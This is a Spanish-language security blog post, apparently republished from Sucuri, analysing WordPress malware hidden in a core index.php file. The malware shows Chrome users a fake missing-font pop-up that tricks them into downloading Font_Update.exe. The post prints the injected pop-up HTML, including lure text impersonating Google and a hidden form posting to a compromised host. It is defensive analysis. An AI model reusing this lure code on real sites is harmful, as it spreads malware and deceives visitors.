Malware para WordPress se Disfraza como Fuente Faltante. Ten Cuidado !

Malware Ataca WordPress.

Todos los días vemos diferentes infecciones de sitios web. Cuando recibimos casos inusuales o interesantes, se disparan nuestros instintos de investigadores y procedemos a profundizar en las causas del comportamiento del sitio web para poder entender el funcionamiento de la infección.

En este caso, el comportamiento inusual fue un pop-up afirmado la falta de una fuente de texto.

El Pop-Up Indeseado

El propietario de un sitio web nos contactó para investigar un error que se mostraba en su sitio. Básicamente, había un pop-up informando a los visitantes que no eran capaces de ver el contenido porque no contaban con una fuente de texto llamada “HoeflerText” instalada en sus computadoras:

Fuente  “HoeflerText” Faltante

Este malware trata de engañar a los visitantes para que hagan clic en el botón “Update” (actualizar) para descargar un archivo malicioso llamado Font_Update.exe.

A principios de este año, escribimos sobre una ola de infecciones de WordPress que involucraban plugins maliciosos inyectando scripts ofuscados para crear pop-up/pop-unders no deseados para servir publicidad no deseada.

Tambien te puede interesar:
Descubre cómo los ciberdelincuentes introducen malware en un “PDF”.

En este caso, el código malicioso estaba almacenado en un archivo del núcleo y no en un plugin.

Código Malicioso en un Archivo del Núcleo de WordPress

Snippet 1
Snippet de código verificando el tipo de navegador desde el archivo del núcleo de WordPress ./index.php

El snippet anterior muestra el código inyectado dentro del archivo ./index.php del núcleo de WordPress. Este código verifica el tipo y la version del navegador. En este caso, el objetivo eran solamente los navegadores Chrome.

La Advertencia de la Fuente Faltante Falsa

El otro código y regex son responsables de mostrar la página de manera incorrecta al cliente.

La página se muestra dañada en un intento de convencer al usuario de que todo se trata a causa de la fuente faltante.

Al agregar la advertencia de fuente faltante, el hacker intenta lograr que el pop-up pase de manera discreta para los visitantes.

La otra parte del código malicioso muestra el pop-up y la alerta a los visitantes sobre la fuente “HoeflerText” faltante en sus computadoras:

<div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' />
                    <p id="pphh">The "HoeflerText" font wasn't found.</p>
                </div>
                <div id="odiv9">
                    <p id="info1">The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p>
                    <p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Font_Update.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p>
                    <div id="divtabl">
                        <table id="tabl1">
                            <tbody id="tbody1">
                                <tr id="trtr1">
                                    <td id="tdtd1">Manufacturer:</td>
                                    <td id="tdtd1">Google Inc. All Rights Reserved</td>
                                </tr>
                                <tr id="trtr1">
                                    <td id="tdtd1">Current version:</td>
                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td>
                                </tr>
                                <tr id="trtr1">
                                    <td id="tdtd1">Latest version:</td>
                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td>
                                </tr>
                            </tbody>
                        </table>
                        <div id="helpimg"><img id="inf0s" alt='' /></div>
                    </div>
                    <form action="https://another-hacked-website.com/avx/images/x86x.php" method="post" id="form_1d"><input type='hidden' name='infol' value='i+veHk+yCYMGJN0u3V+Nq1SdFdRlNVmXm+k+oC6hANGXowqEYpTQww==' /></form>
                    <div id="upe0" onclick="ue0()"><a href="javascript:void(0)" id="b00tn">Update</a></div>
                </div>
            </div>
        </div>
    </div>
    <div id="popup-container" class="popup-window gc" style="display:none;">
        <div class="bigarrow element-animation"></div>

¿Dónde está el Malware?

Los hackers almacenaron el malware en el archivo hxxps://Another-Hacked-site[.]dom/avx/images/x86x.php de otro sitio web hackeado.

Una vez que el visitante hace clic en el botón Update para descargar la fuente faltante, aparece una URL de Dropbox y se descarga el archivo malicioso Font_Update.exe a la computadora de la víctima.

Conclusión

En esta publicación, te mostramos una de las formas en que los malos actores pueden disfrazar su código malicioso inyectado.

Este incidente pone en claro la importancia que tiene la seguridad de sitios web, tanto para los propietarios de los sitios como para los visitantes.

____________________________________________________________
Tomado de: https://blog.sucuri.net/espanol/2018/08/malware-disfrazado-de-fuente-faltante.html
Se Respetan Derechos de Autor.

302total visits,2visits today